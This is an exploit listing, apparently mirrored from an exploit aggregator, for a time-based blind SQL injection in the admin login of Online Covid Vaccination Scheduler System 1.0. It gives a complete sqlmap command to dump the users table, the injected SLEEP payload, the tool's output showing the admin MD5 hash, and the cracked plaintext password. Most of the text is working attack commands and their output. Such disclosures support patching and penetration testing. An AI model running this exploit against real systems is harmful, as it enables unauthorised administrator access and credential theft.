Exploit for Online Covid Vaccination Scheduler System 1.0 SQL Injection

Name: Exploit for Online Covid Vaccination Scheduler System 1.0 SQL Injection
Rating: 5 (324 reviews)
2021-07-07 | CVSS 0.7
## https://sploitus.com/exploit?id=PACKETSTORM:163415
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection  
# Date: 2021-07-07  
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip  
# Version: 1.0  
# Tested on: Windows 10, XAMPP  
  
  
################  
# Description #  
################  
  
The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection.  
Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator.  
  
  
###########  
# PoC #  
###########  
  
Run sqlmap to dump username and password:  
  
$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump  
  
  
###########  
# Output #  
###########  
  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla  
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
web server operating system: Windows  
web application technology: PHP 5.6.24, Apache 2.4.23  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
current database: 'scheduler'  
  
Database: scheduler  
Table: users  
[1 entry]  
+----------+----------------------------------+  
| username | password |  
+----------+----------------------------------+  
| admin | 0192023a7bbd73250516f069df18b500 |  
+----------+----------------------------------+  
  
  
The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123